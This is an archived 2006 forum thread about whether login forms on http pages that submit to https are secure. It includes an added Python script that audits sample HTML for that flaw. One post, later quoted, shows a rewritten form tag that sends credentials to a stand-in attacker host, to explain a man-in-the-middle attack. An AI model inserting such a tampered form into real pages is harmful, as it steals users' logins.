
Webmaster General Forum

    
log in then https?
Clinton Labombard




msg:390336
 2:22 am on Mar 27, 2006 (gmt 0)

I've noticed some sites will allow you to enter your login information with an http page then after you've hit the submit button it switches to an https page. Is that secure?

(by the way, shouldn't there be a security related section here? )

 

Raymond




msg:390337
 4:30 am on Mar 27, 2006 (gmt 0)

Nothing is encrypted in http, so if you enter your password in http, it can be seen as plain text.

MichaelBluejay




msg:390338
 2:18 pm on Mar 27, 2006 (gmt 0)

There's more to this issue than you think. The bottom line is, your info is not secure, but not for the reason Raymond thinks. The HTML behind the login form will be something like <form action="http://www.domain.com/login.cgi">. If the action is https://, the form is submitted securely. If the action is http:// (without the "s"), it's not.

But there's another problem: If the <form> resides on a page that is itself insecure (http:// instead of https://), then a hacker listening in could have intercepted the page and hacked it before sending it to the user, replacing the form with something like <form action="http://www.evilhacker.com">. The problem is not the missing "s", the problem is that when you hit Submit, you'll be sending your info straight to a hacker.

Amazingly, most banks' login forms are on insecure pages. What's worse, if you click the little Security Info icon under the login form, you get a page with some B.S. about how the form is supposedly secure because the action url is https://. But in reality, the login is compromised if it's on an insecure page because it could have been hacked before the user ever sees it. The banks' method of security is like having a house with two doors and locking one of them (and then falsely telling everyone that the house is completely secure.)

Netcraft and Microsoft have been telling banks not to do this, but they're not listening.

More at Netcraft: [news.netcraft.com...]
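As an added example (not code from any poster in this thread), the following script encodes the two checks the post above describes: the page carrying the form must itself be served over https, and every form action must resolve to https. The URL and HTML it runs on are constructed sample data.

```python
# Added example (not from the thread): audit a login page the way the
# post above describes, on constructed HTML, without touching the network.
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormCollector(HTMLParser):
    """Collect the action attribute of every <form> in the page."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "form":
            self.actions.append(dict(attrs).get("action") or "")


def audit_login_page(page_url, html):
    """Return a list of findings for a page that carries a login form.

    1. The page itself must be served over https; otherwise anyone in the
       path can rewrite the form before the user sees it (the "two doors").
    2. Each form action must resolve to https; otherwise the submitted
       credentials travel in clear text.
    """
    findings = []
    page_scheme = urlsplit(page_url).scheme
    if page_scheme != "https":
        findings.append("page served over %s: form could be rewritten in transit" % page_scheme)
    parser = _FormCollector()
    parser.feed(html)
    if not parser.actions:
        findings.append("no <form> found")
    for action in parser.actions:
        # A relative action inherits the page's scheme, so resolve it first.
        target = urljoin(page_url, action)
        scheme = urlsplit(target).scheme
        if scheme != "https":
            findings.append("form action %s submits over %s: credentials sent in clear text" % (target, scheme))
    return findings


# Constructed sample: the "double-door" layout the thread describes,
# an http page whose form action is https.
SAMPLE_URL = "http://www.example.com/login.html"
SAMPLE_HTML = """<html><body>
<form action="https://www.example.com/login.cgi" method="post">
  <input name="user"><input name="pass" type="password">
</form></body></html>"""

if __name__ == "__main__":
    for line in audit_login_page(SAMPLE_URL, SAMPLE_HTML):
        print(line)
```

A relative action such as `/login.cgi` on an http page is reported as a clear-text submission, since it inherits the page's scheme.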

Clinton Labombard




msg:390339
 4:27 pm on Mar 27, 2006 (gmt 0)

I see. Thank you very much. I know of a few credit card companies that use the 'double-door' method.

ronburk




msg:390340
 9:43 pm on Mar 27, 2006 (gmt 0)

Nothing is encrypted in http, so if you enter your password in http, it can be seen as plain text.

Perhaps too broad an inference to draw from just the word "http". JavaScript or other client-side code is free to encrypt and transmit over HTTP. Digest authentication is reasonably widely supported at this point.

But there's another problem: If the <form> resides on a page that is itself insecure (http:// instead of https://), then a hacker listening in could have intercepted the page and hacked it before sending it to the user, replacing the form with something like <form action="http://www.evilhacker.com">. The problem is not the missing "s", the problem is that when you hit Submit, you'll be sending your info straight to a hacker.

Presumes the bad guy has control of the network either in the middle or on the server side. I would certainly not be wanting to trust my login information to even HTTPS at that point.
